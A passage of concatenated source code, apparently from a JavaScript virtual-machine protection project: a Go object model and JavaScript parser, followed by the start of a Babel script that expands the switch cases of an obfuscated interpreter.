delete(sm.M, key)
}
type Object interface {
Type() string
ToString() string
}
type NumericObject struct {
Value float64
}
func (ob *NumericObject) Type() string {
return token.TYNUM
}
func (ob *NumericObject) ToString() string {
str := strconv.FormatFloat(ob.Value, 'f', -1, 64)
return str
}
type StringObject struct {
Value string
Key string
}
func (ob *StringObject) Type() string {
return token.TYSTR
}
func (ob *StringObject) Slice(start int, end int) string {
return ob.Value[start:end]
}
func (ob *StringObject) ToString() string {
return ob.Value
}
type ByteObject struct {
Value []byte
Key string
}
func (ob *ByteObject) Type() string {
return token.BYTE
}
func (ob *ByteObject) ToString() string {
hexString := hex.EncodeToString(ob.Value)
return hexString
}
type NULLObject struct {
}
func (ob *NULLObject) Type() string {
return token.BULLE
}
func (ob *NULLObject) ToString() string {
return token.NNNN
}
type NanObject struct {
}
func (ob *NanObject) Type() string {
return token.NANINFO
}
func (ob *NanObject) ToString() string {
return token.NANINFO
}
type Environment struct {
Value []*Object
Store *SafeMap
Outer *Environment
Key string
TypeInfo string
}
func (ob *Environment) Type() string {
if ob.TypeInfo == "" {
return token.TYNUM
}
return ob.TypeInfo
}
func (ob *Environment) ToString() string {
if ob.TypeInfo == token.ArrayE || ob.TypeInfo == token.Object {
return token.YOUZ + ob.TypeInfo + token.ZUOZ
}
return token.YOUZ + token.THIS + token.ZUOZ
}
func (ob *Environment) Slice(start int, end int) []*Object {
return ob.Value[start:end]
}
type BoolObject struct {
Value bool
}
func (ob *BoolObject) Type() string {
return token.BOOL
}
func (ob *BoolObject) ToString() string {
if ob.Value == true {
return token.TRUE
}
return token.FALSE
}
type BreakObject struct {
}
func (ob *BreakObject) Type() string {
return token.BREAK
}
func (ob *BreakObject) ToString() string {
return token.BREAK
}
type ContinueObject struct {
}
func (ob *ContinueObject) Type() string {
return token.CONTINUE
}
func (ob *ContinueObject) ToString() string {
return token.CONTINUE
}
type FunctionDeclarationObject struct {
Params []*ast.Statement
Args []*Object
Body ast.Statement
NativeBody *func(*FunctionDeclarationObject) Object
Env *Environment
IsNative int
Callthis int
BindType string
BindOb any
}
func (ob *FunctionDeclarationObject) Type() string {
return token.FUNCTION
}
func (ob *FunctionDeclarationObject) ToString() string {
return token.FUNCTION
}
type ReturnStatementObject struct {
Value Object
}
func new_Func(ddd *func(*FunctionDeclarationObject) Object) Object {
d := &FunctionDeclarationObject{IsNative: 1, NativeBody: ddd}
return d
}
func (ob *ReturnStatementObject) Type() string {
return token.RETURN
}
func (ob *ReturnStatementObject) ToString() string {
return token.RETURN
}
func array_push(myfun *FunctionDeclarationObject) Object {
Listg := myfun.Env
args := myfun.Args
for _, v := range args {
Listg.Value = append(Listg.Value, v)
}
return &NumericObject{Value: float64(len(Listg.Value))}
}
func array_pop(myfun *FunctionDeclarationObject) Object {
Listg := myfun.Env
if len(Listg.Value) == 0 {
return &NumericObject{}
}
out := Listg.Value[len(Listg.Value)-1]
Listg.Value = Listg.Value[:len(Listg.Value)-1]
return *out
}
func array_join(myfun *FunctionDeclarationObject) Object {
Listg := myfun.Env
ds := []string{}
jst := (*myfun.Args[0]).(*StringObject).Value
for _, v := range Listg.Value {
ds = append(ds, (*v).ToString())
}
return &StringObject{
Value: strings.Join(ds, jst),
}
}
func NewArray() Environment {
dtte := NewEnv(nil)
dtte.TypeInfo = token.ArrayE
dtte.Value = make([]*Object, 0)
Push := array_push
dtte.Store.Set(token.PUSH, new_Func(&Push))
Pop := array_pop
dtte.Store.Set(token.POP, new_Func(&Pop))
Join := array_join
dtte.Store.Set(token.JION, new_Func(&Join))
return *dtte
}
func NewObject() Environment {
dtte := NewEnv(nil)
dtte.TypeInfo = token.Object
return *dtte
}
func NewEnv(eg *Environment) *Environment {
//s := make(map[string]object.Object)
s := NewSafeMap()
env := &Environment{Store: s, Outer: eg, TypeInfo: token.ENV}
return env
}
|
2833844911/gojsvmp | 24,772 | parse/parse_new.go | package parse
import (
"fmt"
"myvmp/ast"
"myvmp/token"
"os"
"strconv"
)
type allDtInfo struct {
Start int
ShangOne ast.Statement
Alldtd []*token.TokenType
}
func (oo *allDtInfo) getDt() *token.TokenType {
v := oo.Alldtd[oo.Start]
oo.Start++
return v
}
func (oo *allDtInfo) getNextkey() *token.TokenType {
v := oo.Alldtd[oo.Start]
return v
}
func newdt(vhh []*token.TokenType) *allDtInfo {
data := &allDtInfo{Start: 0, Alldtd: vhh}
return data
}
func (oo *allDtInfo) isover() bool {
if oo.Start >= len(oo.Alldtd) {
return true
}
return false
}
func parseBinaryExpression(alldata *allDtInfo, opert *token.TokenType) ast.Statement {
huu := alldata.ShangOne
alldata.ShangOne = nil
Right := parseData(alldata)
alldata.ShangOne = huu
hds := alldata.getNextkey()
if opert.PAXU <= hds.PAXU && alldata.getNextkey().TypeInfo != token.OVER && alldata.getNextkey().TypeInfo != token.YOUOK && alldata.getNextkey().TypeInfo != token.ZUOZ && alldata.getNextkey().TypeInfo != token.DH && alldata.getNextkey().TypeInfo != token.HUOHUO && alldata.getNextkey().TypeInfo != token.YUYU {
aldt := &ast.BinaryExpression{Left: alldata.ShangOne}
aldt.Operator = opert.TypeInfo
alldata.ShangOne = Right
mytkdd := alldata.getDt()
Left := parseBinaryExpression(alldata, mytkdd)
aldt.Right = Left
return aldt
} else {
aldt := &ast.BinaryExpression{Left: alldata.ShangOne}
aldt.Operator = opert.TypeInfo
aldt.Right = Right
alldata.ShangOne = aldt
if alldata.getNextkey().TypeInfo == token.OVER || alldata.getNextkey().TypeInfo == token.YOUOK || alldata.getNextkey().TypeInfo == token.ZUOZ || alldata.getNextkey().TypeInfo == token.DH || alldata.getNextkey().TypeInfo == token.YUYU || alldata.getNextkey().TypeInfo == token.HUOHUO {
sseee := alldata.ShangOne
return sseee
}
hu := parseData(alldata)
var dsadasd ast.Statement
if hu == nil {
dsadasd = aldt
} else {
dsadasd = hu
}
return dsadasd
}
}
func parseYpuxianKuoHao(alldata *allDtInfo) ast.Statement {
alldata.ShangOne = nil
for {
dtt := parseData(alldata)
if alldata.getNextkey().TypeInfo == token.YOUOK {
alldata.Start++
zbrt := dtt
alldata.ShangOne = dtt
var dtife ast.Statement
var dtif ast.Statement
dtife = zbrt
if alldata.getNextkey().TypeInfo == token.ZHUOK {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseCallE(alldata)
} else if alldata.getNextkey().TypeInfo == token.Dian {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseMemberExpression(alldata, false)
} else if alldata.getNextkey().TypeInfo == token.YOUZ {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseMemberExpression(alldata, true)
} else if alldata.getNextkey().TypeInfo == token.DENYU {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.DENYU}
dds := parseAss(alldata)
dshhh.Right = dds
dtif = dshhh
} else if alldata.getNextkey().TypeInfo == token.JIADEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JIADEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else if alldata.getNextkey().TypeInfo == token.JANDEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JANDEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else {
dtif = dtife
}
alldata.ShangOne = dtif
//huff := parseBin(alldata)
//if huff == nil {
// dtif = dtif
//} else {
// dtif = huff
//}
return dtif
}
alldata.ShangOne = dtt
}
}
func parseCallE(alldata *allDtInfo) ast.Statement {
caleer := alldata.ShangOne
alldata.ShangOne = nil
Calle := &ast.CallExpression{Caller: caleer, Arguments: make([]*ast.Statement, 0)}
if alldata.getNextkey().TypeInfo != token.YOUOK {
for {
dtt := parseData(alldata)
if alldata.getNextkey().TypeInfo == token.DH {
alldata.Start++
kp := dtt
Calle.Arguments = append(Calle.Arguments, &kp)
alldata.ShangOne = nil
continue
}
if alldata.getNextkey().TypeInfo == token.YOUOK {
alldata.Start++
kp := dtt
alldata.ShangOne = nil
Calle.Arguments = append(Calle.Arguments, &kp)
break
}
alldata.ShangOne = dtt
}
} else {
alldata.Start++
}
//alldata.ShangOne = Calle
dtife := Calle
var dtif ast.Statement
if alldata.getNextkey().TypeInfo == token.ZHUOK {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseCallE(alldata)
} else if alldata.getNextkey().TypeInfo == token.Dian {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseMemberExpression(alldata, false)
} else if alldata.getNextkey().TypeInfo == token.YOUZ {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseMemberExpression(alldata, true)
} else if alldata.getNextkey().TypeInfo == token.DENYU {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.DENYU}
dds := parseAss(alldata)
dshhh.Right = dds
dtif = dshhh
} else if alldata.getNextkey().TypeInfo == token.JIADEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JIADEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else if alldata.getNextkey().TypeInfo == token.JANDEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JANDEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else {
dtif = dtife
}
alldata.ShangOne = dtif
//hu := parseBin(alldata)
//if hu == nil {
// dtif = dtif
//} else {
// dtif = hu
//}
return dtif
}
func parseNEW(alldata *allDtInfo) ast.Statement {
caleer := parseData(alldata)
dasd := caleer.(*ast.CallExpression)
alldata.ShangOne = nil
Calle := &ast.NewExpression{Callee: dasd.Caller, Arguments: dasd.Arguments}
return Calle
}
func parseMemberExpression(alldata *allDtInfo, computed bool) ast.Statement {
allh := ast.MemberExpression{Object: alldata.ShangOne}
if computed == false {
dtt := alldata.getDt()
allh.Property = &ast.StringLiteral{Value: dtt.Value}
} else {
dtt := overDD(alldata)
alldata.Start++
allh.Property = dtt
}
alldata.ShangOne = &allh
if alldata.getNextkey().TypeInfo == token.ZHUOK {
alldata.Start++
dtif := parseCallE(alldata)
return dtif
} else if alldata.getNextkey().TypeInfo == token.DENYU {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: &allh, Operator: token.DENYU}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else if alldata.getNextkey().TypeInfo == token.JIADEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: &allh, Operator: token.JIADEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else if alldata.getNextkey().TypeInfo == token.JANDEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: &allh, Operator: token.JANDEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
}
if alldata.getNextkey().TypeInfo != token.Dian && alldata.getNextkey().TypeInfo != token.YOUZ {
alldata.ShangOne = &allh
//hu := parseBin(alldata)
//var dsadasd ast.Statement
//if hu == nil {
// dsadasd = &allh
//} else {
// dsadasd = hu
//}
dsadasd := &allh
return dsadasd
}
if alldata.getNextkey().TypeInfo == token.Dian {
alldata.Start++
return parseMemberExpression(alldata, false)
} else {
alldata.Start++
return parseMemberExpression(alldata, true)
}
}
func parseBlack(alldata *allDtInfo) ast.Statement {
dataBody := []*ast.Statement{}
djjj := &ast.BlockStatement{Body: dataBody}
for {
ji := parseData(alldata)
if ji.StatementNode() == token.ZUOKH {
break
}
alldata.ShangOne = nil
if ji.StatementNode() == token.OVER {
continue
}
dashdk := ji
djjj.Body = append(djjj.Body, &dashdk)
}
alldata.ShangOne = nil
return djjj
}
func parseIf(alldata *allDtInfo) ast.Statement {
alldata.Start++
for {
dtt := parseData(alldata)
alldata.ShangOne = dtt
if alldata.getNextkey().TypeInfo == token.YOUOK {
//alldata.ShangOne = nil
alldata.Start++
break
}
if alldata.isover() {
fmt.Println("缺少 ')'")
return nil
}
}
test := alldata.ShangOne
alldata.ShangOne = nil
dtt := ast.IfStatement{Test: test}
alldata.Start++
Cope := parseBlack(alldata)
dtt.Consequent = Cope
if alldata.getNextkey().TypeInfo == token.ELSE {
alldata.Start++
if alldata.getNextkey().TypeInfo == token.YOUKH {
alldata.Start++
dtt.Alternate = parseBlack(alldata)
} else {
dtt.Alternate = parseData(alldata)
}
}
return &dtt
}
func parseForIn(alldata *allDtInfo, intt ast.Statement) ast.Statement {
fori := &ast.ForInStatement{
Left: intt,
}
for {
dtt := parseData(alldata)
alldata.ShangOne = dtt
if alldata.getNextkey().TypeInfo == token.YOUOK {
fori.Right = dtt
alldata.Start++
break
}
}
alldata.Start++
Cope := parseBlack(alldata)
fori.Body = Cope
return fori
}
func parseFor(alldata *allDtInfo) ast.Statement {
alldata.Start++
alldata.ShangOne = nil
dat := &ast.ForStatement{}
if alldata.getNextkey().TypeInfo == token.OVER {
} else {
for {
dtt := parseData(alldata)
alldata.ShangOne = dtt
if alldata.getNextkey().TypeInfo == token.OVER {
dat.Init = dtt
alldata.Start++
break
} else if alldata.getNextkey().TypeInfo == token.IN {
alldata.Start++
return parseForIn(alldata, dtt)
}
}
}
if alldata.getNextkey().TypeInfo == token.OVER {
alldata.Start++
} else {
for {
dtt := parseData(alldata)
alldata.ShangOne = dtt
if alldata.getNextkey().TypeInfo == token.OVER {
dat.Test = dtt
alldata.Start++
break
}
}
}
if alldata.getNextkey().TypeInfo == token.YOUOK {
alldata.Start++
} else {
for {
dtt := parseData(alldata)
alldata.ShangOne = dtt
if alldata.getNextkey().TypeInfo == token.YOUOK {
dat.Updata = dtt
alldata.Start++
break
}
}
}
alldata.Start++
Cope := parseBlack(alldata)
dat.Body = Cope
alldata.ShangOne = nil
return dat
}
func parseAss(alldata *allDtInfo) ast.Statement {
for {
dtt := parseData(alldata)
alldata.ShangOne = dtt
if alldata.getNextkey().TypeInfo == token.OVER {
//alldata.Start++
alldata.ShangOne = nil
return dtt
} else if alldata.getNextkey().TypeInfo == token.YOUOK {
alldata.ShangOne = nil
return dtt
} else if alldata.getNextkey().TypeInfo == token.ZUOKH {
alldata.ShangOne = nil
return dtt
}
}
}
func parseFun(alldata *allDtInfo) ast.Statement {
if alldata.getNextkey().TypeInfo == token.ZHUOK {
dayy := &ast.FunctionExpression{Params: make([]*ast.Statement, 0)}
alldata.Start++
if alldata.getNextkey().TypeInfo != token.YOUOK {
for {
dtt := parseData(alldata)
if alldata.getNextkey().TypeInfo == token.DH {
alldata.Start++
kp := dtt
dayy.Params = append(dayy.Params, &kp)
alldata.ShangOne = nil
continue
}
if alldata.getNextkey().TypeInfo == token.YOUOK {
alldata.Start++
dayy.Params = append(dayy.Params, &dtt)
alldata.ShangOne = nil
break
}
}
} else {
alldata.Start++
}
alldata.Start++
dayy.Body = parseBlack(alldata)
return dayy
} else {
dayy := &ast.FunctionDeclaration{Params: make([]*ast.Statement, 0)}
dsd := &ast.Identifier{Name: alldata.getDt().Value}
dayy.Id = dsd
alldata.Start++
if alldata.getNextkey().TypeInfo != token.YOUOK {
for {
dtt := parseData(alldata)
if alldata.getNextkey().TypeInfo == token.DH {
alldata.Start++
kp := dtt
dayy.Params = append(dayy.Params, &kp)
alldata.ShangOne = nil
continue
}
if alldata.getNextkey().TypeInfo == token.YOUOK {
alldata.Start++
dayy.Params = append(dayy.Params, &dtt)
alldata.ShangOne = nil
break
}
}
} else {
alldata.Start++
}
alldata.Start++
dayy.Body = parseBlack(alldata)
return dayy
}
}
func parseVAR(alldata *allDtInfo) ast.Statement {
das := ast.VariableDeclaration{Declarations: make([]*ast.Statement, 0)}
for {
gu := alldata.getDt()
dttw := ast.Identifier{Name: gu.Value}
var dtt ast.Statement = &dttw
das.Declarations = append(das.Declarations, &dtt)
if alldata.getNextkey().TypeInfo == token.DH {
alldata.Start++
alldata.ShangOne = nil
continue
}
if alldata.getNextkey().TypeInfo == token.DENYU {
alldata.Start++
alldata.ShangOne = nil
break
} else if alldata.getNextkey().TypeInfo == token.OVER {
alldata.ShangOne = nil
return &das
} else if alldata.getNextkey().TypeInfo == token.IN {
alldata.ShangOne = nil
return &das
}
}
das.Init = overYH(alldata)
return &das
}
func overYH(alldata *allDtInfo) ast.Statement {
if alldata.getNextkey().TypeInfo == token.OVER {
alldata.Start++
alldata.ShangOne = nil
return &ast.OVER{TypeInfo: token.OVER}
}
for {
dtt := parseData(alldata)
alldata.ShangOne = dtt
if alldata.getNextkey().TypeInfo == token.OVER {
alldata.ShangOne = nil
return dtt
} else if alldata.getNextkey().TypeInfo == token.YOUOK {
alldata.ShangOne = nil
return dtt
} else if alldata.getNextkey().TypeInfo == token.ZUOKH {
alldata.ShangOne = nil
return dtt
}
}
}
func overDD(alldata *allDtInfo) ast.Statement {
if alldata.getNextkey().TypeInfo == token.OVER {
alldata.Start++
alldata.ShangOne = nil
return &ast.OVER{TypeInfo: token.OVER}
}
for {
dtt := parseData(alldata)
alldata.ShangOne = dtt
if alldata.getNextkey().TypeInfo == token.ZUOZ {
alldata.ShangOne = nil
return dtt
}
}
}
func parseTRY(alldata *allDtInfo) ast.Statement {
das := ast.TryStatement{}
alldata.Start++
das.Block = parseBlack(alldata)
alldata.Start++
dasghj := ast.CatchClause{}
if alldata.getNextkey().TypeInfo == token.ZHUOK {
alldata.Start++
dasd := alldata.getDt()
bh := ast.Identifier{Name: dasd.Value}
dasghj.Param = &bh
alldata.Start++
alldata.Start++
} else {
alldata.Start++
}
dasghj.Body = parseBlack(alldata)
das.Handler = &dasghj
alldata.ShangOne = nil
return &das
}
func parseUnary(alldata *allDtInfo, sdqm token.TokenType) ast.Statement {
das := ast.UnaryExpression{Operator: sdqm.Value}
das.Argument = parseData(alldata)
return &das
}
func parseArray(alldata *allDtInfo) ast.Statement {
das := ast.ArrayExpression{Elements: make([]*ast.Statement, 0)}
if alldata.getNextkey().TypeInfo != token.ZUOZ {
for {
dtt := parseData(alldata)
if alldata.getNextkey().TypeInfo == token.DH {
alldata.Start++
kp := dtt
das.Elements = append(das.Elements, &kp)
alldata.ShangOne = nil
continue
}
if alldata.getNextkey().TypeInfo == token.ZUOZ {
alldata.Start++
kp := dtt
das.Elements = append(das.Elements, &kp)
break
}
}
} else {
alldata.Start++
}
if alldata.getNextkey().TypeInfo != token.Dian && alldata.getNextkey().TypeInfo != token.YOUZ {
//hu := parseBin(alldata)
//var dsadasd ast.Statement
//if hu == nil {
// dsadasd = &allh
//} else {
// dsadasd = hu
//}
dsadasd := &das
return dsadasd
}
if alldata.getNextkey().TypeInfo == token.Dian {
alldata.Start++
alldata.ShangOne = &das
return parseMemberExpression(alldata, false)
} else {
alldata.Start++
alldata.ShangOne = &das
return parseMemberExpression(alldata, true)
}
}
func parseObject(alldata *allDtInfo) ast.Statement {
das := ast.ObjectExpression{Properties: make([]*ast.Statement, 0)}
var dsfhc ast.Statement
if alldata.getNextkey().TypeInfo != token.ZUOKH {
for {
jklads := ast.Property{}
dtt := parseData(alldata)
if dtt.StatementNode() == token.OVER {
continue
}
if dtt.StatementNode() == token.ZUOKH {
if dsfhc != nil {
das.Properties = append(das.Properties, &dsfhc)
}
break
}
alldata.Start++
jklads.Key = dtt
value := parseData(alldata)
jklads.Value = value
var dsf ast.Statement = &jklads
dsfhc = dsf
if alldata.getNextkey().TypeInfo == token.DH {
alldata.Start++
das.Properties = append(das.Properties, &dsf)
dsfhc = nil
alldata.ShangOne = nil
continue
}
if alldata.getNextkey().TypeInfo == token.ZUOKH {
alldata.Start++
das.Properties = append(das.Properties, &dsf)
break
}
}
} else {
alldata.Start++
}
return &das
}
func parseRet(alldata *allDtInfo) ast.Statement {
das := ast.ReturnStatement{}
das.Argument = parseData(alldata)
return &das
}
func parseUpdate(alldata *allDtInfo, opert *token.TokenType, ty bool) ast.Statement {
jhi := alldata.ShangOne
das := ast.UnaryExpression{Argument: jhi, Operator: opert.Value}
das.Prefix = ty
alldata.ShangOne = &das
//hu := parseBin(alldata)
//var dsadasd ast.Statement
//if hu == nil {
// dsadasd = &das
//} else {
// dsadasd = hu
//}
dsadasd := &das
return dsadasd
}
func parseBin(alldata *allDtInfo, mytk *token.TokenType) ast.Statement {
//mytk := alldata.getNextkey()
var dtif ast.Statement
//alldata.Start++
switch mytk.TypeInfo {
case token.ADD:
dtif = parseBinaryExpression(alldata, mytk)
case token.CHEN:
dtif = parseBinaryExpression(alldata, mytk)
case token.SDD:
if alldata.ShangOne == nil {
dsdh := &ast.NumericLiteral{Value: 0}
var dsdoooo ast.Statement = dsdh
alldata.ShangOne = dsdoooo
}
dtif = parseBinaryExpression(alldata, mytk)
case token.DXIAND:
alldata.Start++
dtif = parseBinaryExpression(alldata, mytk)
case token.CHU:
dtif = parseBinaryExpression(alldata, mytk)
case token.XIAND:
dtif = parseBinaryExpression(alldata, mytk)
case token.YIHUO:
dtif = parseBinaryExpression(alldata, mytk)
case token.HUO:
dtif = parseBinaryExpression(alldata, mytk)
case token.HUOHUO:
dtif = parseBinaryExpression(alldata, mytk)
case token.YU:
dtif = parseBinaryExpression(alldata, mytk)
case token.YUYU:
dtif = parseBinaryExpression(alldata, mytk)
case token.XIAOYH:
dtif = parseBinaryExpression(alldata, mytk)
case token.XIAOYHYH:
dtif = parseBinaryExpression(alldata, mytk)
case token.XIAOYHYHYH:
dtif = parseBinaryExpression(alldata, mytk)
case token.QUYU:
dtif = parseBinaryExpression(alldata, mytk)
case token.XIAOYHDY:
dtif = parseBinaryExpression(alldata, mytk)
case token.DAYH:
dtif = parseBinaryExpression(alldata, mytk)
case token.DAYHDY:
dtif = parseBinaryExpression(alldata, mytk)
case token.DAYHYH:
dtif = parseBinaryExpression(alldata, mytk)
case token.DAYHYHYU:
dtif = parseBinaryExpression(alldata, mytk)
case token.BUDY:
dtif = parseBinaryExpression(alldata, mytk)
case token.KAIFAN:
dtif = parseBinaryExpression(alldata, mytk)
case token.BUDYDY:
dtif = parseBinaryExpression(alldata, mytk)
case token.UPADD:
dtif = parseUpdate(alldata, mytk, false)
case token.UPASD:
dtif = parseUpdate(alldata, mytk, false)
default:
fmt.Println("js 语法错误", mytk.Value)
os.Exit(0)
alldata.Start--
}
return dtif
}
func parseData(alldata *allDtInfo) ast.Statement {
mytk := alldata.getDt()
var dtif ast.Statement
switch mytk.TypeInfo {
case token.IF:
dtif = parseIf(alldata)
case token.YOUKH:
dtif = parseObject(alldata)
case token.TYPEOF:
dtif = parseUnary(alldata, *mytk)
//case token.SDD:
// dtif = parseUnary(alldata, *mytk)
case token.UPADD:
if alldata.ShangOne == nil {
alldata.ShangOne = parseData(alldata)
dtif = parseUpdate(alldata, mytk, true)
} else {
dsada := alldata.ShangOne
dtif = &ast.UnaryExpression{Argument: dsada, Operator: mytk.TypeInfo, Prefix: false}
}
case token.UPASD:
if alldata.ShangOne == nil {
alldata.ShangOne = parseData(alldata)
dtif = parseUpdate(alldata, mytk, true)
} else {
dsada := alldata.ShangOne
dtif = &ast.UnaryExpression{Argument: dsada, Operator: mytk.TypeInfo, Prefix: false}
}
case token.QUFAN:
dtif = parseUnary(alldata, *mytk)
case token.FOR:
dtif = parseFor(alldata)
case token.TRY:
dtif = parseTRY(alldata)
case token.NEW:
dtif = parseNEW(alldata)
case token.RETURN:
dtif = parseRet(alldata)
case token.VAR:
dtif = parseVAR(alldata)
case token.Debug:
dtif = &ast.DebugStatement{}
case token.INT:
zf, _ := strconv.ParseFloat(mytk.Value, 64)
dtif = &ast.NumericLiteral{Value: zf}
alldata.ShangOne = dtif
//hu := parseBin(alldata)
//if hu == nil {
// dtif = dtif
//} else {
// dtif = hu
//}
case token.NULL:
dtif = &ast.NullIdentifier{}
alldata.ShangOne = dtif
//hu := parseBin(alldata)
//if hu == nil {
// dtif = dtif
//} else {
// dtif = hu
//}
case token.Str:
dtifed := &ast.StringLiteral{Value: mytk.Value}
var dtife ast.Statement = dtifed
if alldata.getNextkey().TypeInfo == token.ZHUOK {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseCallE(alldata)
} else if alldata.getNextkey().TypeInfo == token.Dian {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseMemberExpression(alldata, false)
} else if alldata.getNextkey().TypeInfo == token.YOUZ {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseMemberExpression(alldata, true)
} else if alldata.getNextkey().TypeInfo == token.DENYU {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.DENYU}
dds := parseAss(alldata)
dshhh.Right = dds
dtif = dshhh
} else if alldata.getNextkey().TypeInfo == token.JIADEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JIADEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else if alldata.getNextkey().TypeInfo == token.JANDEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JANDEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else {
alldata.ShangOne = dtife
//hu := parseBin(alldata)
//if hu == nil {
// dtif = dtife
//} else {
// dtif = hu
//}
dtif = dtife
}
case token.THIS:
fallthrough
case token.IDENT:
var dtife ast.Statement
if mytk.TypeInfo == token.THIS {
dtife = &ast.ThisExpression{}
} else {
dtife = &ast.Identifier{Name: mytk.Value}
}
if alldata.getNextkey().TypeInfo == token.ZHUOK {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseCallE(alldata)
} else if alldata.getNextkey().TypeInfo == token.Dian {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseMemberExpression(alldata, false)
} else if alldata.getNextkey().TypeInfo == token.YOUZ {
alldata.ShangOne = dtife
alldata.Start++
dtif = parseMemberExpression(alldata, true)
} else if alldata.getNextkey().TypeInfo == token.DENYU {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.DENYU}
dds := parseAss(alldata)
dshhh.Right = dds
dtif = dshhh
} else if alldata.getNextkey().TypeInfo == token.JIADEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JIADEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else if alldata.getNextkey().TypeInfo == token.JANDEN {
alldata.ShangOne = nil
alldata.Start++
dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JANDEN}
dds := parseAss(alldata)
dshhh.Right = dds
return dshhh
} else {
alldata.ShangOne = dtife
//hu := parseBin(alldata)
//if hu == nil {
// dtif = dtife
//} else {
// dtif = hu
//}
dtif = dtife
}
case token.YOUZ:
dtif = parseArray(alldata)
case token.OVER:
dtif = &ast.OVER{TypeInfo: token.OVER}
case token.ZHUOK:
dtif = parseYpuxianKuoHao(alldata)
case token.CONTINUE:
dtif = &ast.ContinueStatement{}
case token.BREAK:
dtif = &ast.BreakStatement{}
case token.FUN:
dtif = parseFun(alldata)
case token.YOUOK:
dtif = &ast.OVER{TypeInfo: token.YOUOK}
case token.ZUOKH:
dtif = &ast.OVER{TypeInfo: token.ZUOKH}
case token.ZUOZ:
dtif = &ast.OVER{TypeInfo: token.ZUOZ}
case token.MAOHAO:
dtif = &ast.OVER{TypeInfo: token.MAOHAO}
case token.DH:
dtif = &ast.OVER{TypeInfo: token.DH}
default:
dtif = parseBin(alldata, mytk)
}
//dtif.StatementNode()
return dtif
}
func stardFun(alldata *allDtInfo) []*ast.Statement {
dataBody := []*ast.Statement{}
for {
ji := overYH(alldata)
if ji.StatementNode() == token.OVER {
if alldata.isover() {
break
}
continue
}
jkdas := ji
dataBody = append(dataBody, &jkdas)
alldata.ShangOne = nil
if alldata.isover() {
break
}
}
return dataBody
}
func NewParse(fd []*token.TokenType) []*ast.Statement {
dt := newdt(fd)
dsd := stardFun(dt)
return dsd
}
|
2833844911/cy_jsvmp | 3,471 | tool/gooutmvp.js | // 指令扩张
const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
const fs = require("fs")
function hsjsvmpTo(data){
// 可以放到别的位置的case块
var cancallzhil = [ 1810,47, 36, 37, 38, 39, 53, 54, 550, 19, 291, 20, 24, 240,
27, 28, 29, 30, 31, 32, 33, 34, 104, 105, 35, 56, 60, 194
];
var cans = JSON.parse(fs.readFileSync('./dist/jiamain.json') + '')
// let data = fs.readFileSync('./tool/jsvmp_02.js') + ''
let ast = parser.parse(data)
let parseNode = {
SwitchStatement(path){
var s = path.node.cases;
var allcans = {}
var zcsz= [];
// 可以添加的方法函数
var cancallzhilw = [];
var cbbs = path.get("cases")
for (let i = 0; i < cbbs.length; i++){
if (cbbs[i].node.test ==null){
continue
}
if (cancallzhil.indexOf(cbbs[i].node.test.value) !== -1){
let f = cbbs[i]
let fg = f.get("consequent")
let dat = ""
for (let i2 = 0; i2 < fg.length; i2++){
if (fg[i2].node.type === "BreakStatement"){
continue
}
// let code = fg[i2]+'';
// code = code.replace(/duei\.cF/g,"duei.sf")
// code = code.replace(/duei\.cf/g,"duei.sf")
// code = code.replace(/duei\.Cf/g,"duei.sf")
dat += "\n";
}
let bhu = parser.parse(dat)
cancallzhilw.push(bhu.program.body)
}
}
for (let i = 0; i < s.length; i++){
if (s[i].test ==null){
zcsz.push(s[i])
continue
}
allcans["z"+s[i].test.value] = s[i].consequent;
}
var skeyList = Object.keys(cans)
for (let i =0; i< skeyList.length; i++){
for (let i2 =0; i2 < cans[skeyList[i]].length; i2++){
let sjbc = Math.floor(Math.random() * cancallzhilw.length)
let bc;
if (Math.random() * 100 > 50){
bc = cancallzhilw[sjbc].concat( allcans[skeyList[i]]);
}else {
